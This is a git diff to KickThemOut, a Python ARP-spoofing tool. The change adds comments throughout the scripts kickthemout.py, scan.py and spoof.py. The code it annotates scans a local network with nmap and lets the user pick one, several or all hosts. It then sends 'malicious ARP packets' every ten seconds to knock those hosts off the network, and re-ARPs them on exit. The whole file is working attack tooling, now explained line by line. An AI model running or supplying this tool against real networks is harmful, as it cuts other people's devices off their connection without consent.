diff --git a/kickthemout.py b/kickthemout.py index 64b4190..50b4887 100644 --- a/kickthemout.py +++ b/kickthemout.py @@ -15,6 +15,7 @@ BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m' notRoot = False try: + # Check if the user is root if os.geteuid() != 0: print("\n{0}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END) notRoot = True @@ -34,6 +35,7 @@ except: raise SystemExit def heading(): + # Function for printing the logo & info sys.stdout.write(GREEN + """ █ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀ █▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █ @@ -48,6 +50,7 @@ def heading(): '\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86)) def optionBanner(): + # Function for printing the list of available commands print('\nChoose option from menu:\n') sleep(0.2) print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE) @@ -59,6 +62,7 @@ def optionBanner(): print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE) def runDebug(): + # Function for printing values & variables for debug print("\n\n{0}WARNING! An unknown error has occurred, starting debug...{1}").format(RED, END) print( "{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private informations removed if necessary){1}").format( @@ -88,6 +92,8 @@ def runDebug(): raise SystemExit def regenOnlineIPs(): + # Function for regenerating the onlineIPs array (made from the hostsLists array from the scan, + # but only with the IP's in it) and setting gateway's IP, and checking if its mac address is set global onlineIPs global defaultGatewayMac global defaultGatewayMacSet @@ -103,14 +109,17 @@ def regenOnlineIPs(): defaultGatewayMac = host[1] if not defaultGatewayMacSet and defaultGatewayMac == "": + # Ask for the gateway's mac address if scapy failed to detect it print("\n{0}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END)) defaultGatewayMac = raw_input(header) defaultGatewayMacSet = True def scanNetwork(): + # Function for scanning the network with the 'scan.py' global hostsList try: + # Passing the network variable to the scan with the 'True' setting of the getDefaultInterface hostsList = scan.scanNetwork(getDefaultInterface(True)) except KeyboardInterrupt: print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END) @@ -118,14 +127,17 @@ def scanNetwork(): except: print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END) raise SystemExit + # onlineIPs also get regenerated after every scan regenOnlineIPs() def kickoneoff(): + # kickoneoff function, launched if the user selects the number for this from the optionBanner os.system("clear||cls") print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END) scanNetwork() + # Print the list of online IP's with vendors print("Online IPs: ") for i in range(len(onlineIPs)): mac = "" @@ -137,6 +149,7 @@ def kickoneoff(): canBreak = False while not canBreak: + # Get the input for which IP to target try: choice = int(raw_input("\nChoose a target: ")) one_target_ip = onlineIPs[choice] @@ -146,6 +159,7 @@ def kickoneoff(): except: print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END) + # Get the mac address of the IP by looping trough the hostList array one_target_mac = "" for host in hostsList: if host[0] == one_target_ip: @@ -159,13 +173,16 @@ def kickoneoff(): print("\n{0}Spoofing started... {1}").format(GREEN, END) try: while True: + # Send a malicious ARP packet in every 10 second spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac) time.sleep(10) except KeyboardInterrupt: + # Re-arp on KeyboardInterrupt print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END) reArp = 1 while reArp != 10: try: + # Send 10 ARP packets with real information to restore the connections spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) except KeyboardInterrupt: pass @@ -177,11 +194,13 @@ def kickoneoff(): def kicksomeoff(): + # kicksomeoff function, launched if the user selects the number for this from the optionBanner os.system("clear||cls") print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END) scanNetwork() + # Print the list of online IP's with vendors print("Online IPs: ") for i in range(len(onlineIPs)): mac = "" @@ -193,6 +212,7 @@ def kicksomeoff(): canBreak = False while not canBreak: + # Get the input for which IPs to target try: choice = raw_input("\nChoose devices to target(comma-separated): ") if ',' in choice: @@ -203,6 +223,7 @@ def kicksomeoff(): except KeyboardInterrupt: return + # Create a string list of the IPs to print it out later some_ipList = "" for i in some_targets: try: @@ -214,11 +235,13 @@ def kicksomeoff(): return some_ipList = some_ipList[:-2] + END + # Print the string IP list print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END) print("\n{0}Spoofing started... {1}").format(GREEN, END) try: while True: + # Send [number of targets] malicious ARP packet in every 10 second for i in some_targets: ip = onlineIPs[int(i)] for host in hostsList: @@ -226,9 +249,11 @@ def kicksomeoff(): spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) time.sleep(10) except KeyboardInterrupt: + # Re-arp on KeyboardInterrupt print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) reArp = 1 while reArp != 10: + # Send 10 ARP packets with real information to restore the connections to every target for i in some_targets: ip = onlineIPs[int(i)] for host in hostsList: @@ -244,11 +269,13 @@ def kicksomeoff(): print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) def kickalloff(): + # kickalloff function, launched if the user selects the number for this from the optionBanner os.system("clear||cls") print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END) scanNetwork() + # Print the list of online IP's with vendors print("Online IPs: ") for i in range(len(onlineIPs)): mac = "" @@ -260,10 +287,13 @@ def kickalloff(): print("\n{0}Spoofing started... {1}").format(GREEN, END) try: + # Send [number of hosts in hostsList array] malicious ARP packet in every 10 second reScan = 0 while True: for host in hostsList: + # Loop trough hostsList array if host[0] != defaultGatewayIP: + # Only sent the packet if the target is not the gateway spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) reScan += 1 if reScan == 4: @@ -274,9 +304,11 @@ def kickalloff(): print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) reArp = 1 while reArp != 10: + # Send 10 ARP packets with real information to restore the connections to every target for host in hostsList: if host[0] != defaultGatewayIP: try: + # Only sent the packet if the target is not the gateway spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) except KeyboardInterrupt: pass @@ -287,6 +319,7 @@ def kickalloff(): print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) def getDefaultInterface(returnNet=False): + # Function for getting the default network interface of the machine with scapy def long2net(arg): if (arg <= 0 or arg >= 0xFFFFFFFF): raise ValueError("illegal netmask value", hex(arg)) @@ -299,6 +332,7 @@ def getDefaultInterface(returnNet=False): return None return net for network, netmask, _, interface, address in scapy.config.conf.route.routes: + # Loop trough ip addresses, skip if local if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0': continue if netmask <= 0 or netmask == 0xFFFFFFFF: @@ -308,21 +342,25 @@ def getDefaultInterface(returnNet=False): continue if net: if returnNet: + # Returning network if the returnNet is set to True (for the network scan) return net else: return interface def getGatewayIP(): + # Function for getting the IP of the gateway with scapy try: getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False) return getGateway_p.src except: + # Ask for the gateway ip address if scapy failed to detect it print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END) header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END)) gatewayIP = raw_input(header) return gatewayIP def getDefaultInterfaceMAC(): + # Function for getting the mac address of the default interface try: defaultInterfaceMac = get_if_hwaddr(defaultInterface) if defaultInterfaceMac == "" or not defaultInterfaceMac: @@ -335,13 +373,16 @@ def getDefaultInterfaceMAC(): else: return defaultInterfaceMac except: + # Ask for the mac address if scapy failed to detect it print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) defaultInterfaceMac = raw_input(header) return defaultInterfaceMac def resolveMac(mac): + # Function for resolving mac addresses to vendor names try: + # Sending web request to macvendors.co url = "http://macvendors.co/api/vendorname/" request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"}) response = urllib.urlopen(request) @@ -354,20 +395,23 @@ def resolveMac(mac): def main(): + # Print the KickThemOut logo heading() print( "\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}" + defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, RED, GREEN, RED, GREEN, END) - + # Print warnings if there are no hosts up if len(hostsList) == 0 or len(hostsList) == 1: if len(hostsList) == 1: if hostsList[0][0] == defaultGatewayIP: + # If gateway found by the scan print("\n{0}{1}WARNING: There are {2}0{3} hosts up on you network except your gateway.\n\tYou can't kick anyone off {4}:/{5}\n").format( GREEN, RED, GREEN, RED, GREEN, END) raise SystemExit else: + # If no gateway or host found by the scan print( "\n{0}{1}WARNING: There are {2}0{3} hosts up on you network.\n\tIt looks like something went wrong {4}:/{5}").format( GREEN, RED, GREEN, RED, GREEN, END) @@ -378,13 +422,17 @@ def main(): try: + # Getting user input with while loop while True: + # Print menu items optionBanner() + # Get user input header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END)) choice = raw_input(header) + # Handling the input if choice.upper() == 'E' or choice.upper() == 'EXIT': print('\n{0}Thanks for dropping by.' '\nCatch ya later!{1}').format(GREEN, END) @@ -400,17 +448,22 @@ def main(): else: print("\n{0}ERROR: Please select a valid option.{1}\n").format(RED, END) + # Stopping loop on KeyboardInterrupt except KeyboardInterrupt: print('\n\n{0}Thanks for dropping by.' '\nCatch ya later!{1}').format(GREEN, END) if __name__ == '__main__': + # -- Start point -- + + # Setting the network info variables defaultInterface = getDefaultInterface() defaultGatewayIP = getGatewayIP() defaultInterfaceMac = getDefaultInterfaceMAC() global defaultGatewayMacSet defaultGatewayMacSet = False + # Scanning network for the first time scanNetwork() main() diff --git a/scan.py b/scan.py index 6aab984..e57354c 100644 --- a/scan.py +++ b/scan.py @@ -4,6 +4,7 @@ # authors: k4m4 & xdavidhu def scanNetwork(network): + # Function for performing a network scan with nmap with the help of the python-nmap module returnlist = [] import nmap nm = nmap.PortScanner() @@ -16,4 +17,5 @@ def scanNetwork(network): except: pass + # returnlist = hostsList array return returnlist diff --git a/spoof.py b/spoof.py index 95c491e..dea1a5c 100644 --- a/spoof.py +++ b/spoof.py @@ -19,6 +19,7 @@ from scapy.all import ( ) def sendPacket(my_mac, gateway_ip, target_ip, target_mac): + # Function for sending the malicious ARP packets out with the specified data ether = Ether() ether.src = my_mac